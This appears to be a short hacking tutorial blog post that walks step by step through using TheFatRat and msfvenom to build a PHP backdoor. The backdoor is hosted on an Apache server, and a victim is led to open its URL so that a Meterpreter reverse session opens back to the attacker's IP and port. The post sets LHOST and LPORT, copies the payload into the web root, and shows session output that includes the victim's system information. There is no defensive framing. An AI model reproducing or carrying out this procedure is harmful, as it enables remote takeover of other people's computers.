Hi, Hackers!! Hi! Today we will learn to build payloads from a common framework called Metasploit and discuss many ways in the application to construct payloads with different extensions and techniques.
Msfvenom is a Metasploit Commandline instance that uses all the types of shellcode available to Metasploit to generate and output.
Step 1: First start TheFatRat script in the terminal.
Step 2: Type 1 to create a Backdoor with msfvenom.
Step 3: Now Type 5 to Inject the Code Using PHP.
Step 4: Now you have to find your IP, type ifconfig in another terminal and search for your IP Address, and then Copy it.
Step 5: Set LHOST - Type <YOUR IP ADDRESS>
Step 6: Set LPORT - 80
Step 7: Enter backdoor file name tstfile
Note - As the above image shows. For a session, this backdoor uses windows payload. After creating the Payload - Transfer the tstfile to the location of Apache server. The IP address is used to access the packet.
Step 8: Type the following commands -
cp tstfile.php /var/www/html sudo service apache2 start
Step 10: Go to the Target Windows Browser and type in URL - 192.168.1.7/tstfile.php
As target open above URL. A PHP script will start in the background and the session will start as shown below.
After the Victim opens the above URL in the browser, the PHP script begins to launch in the background, and as seen below, the session begins.
[*] Meterpreter session 1 opened (IP:PORT -> VICTIM IP: PORT) at TIME Id Information Connection ------ ------------ ---------- msf exploit(handler) > session -i 1 meterpreter > sysinfo VICTIM SYSTEM INFO----------------------------- meterpreter >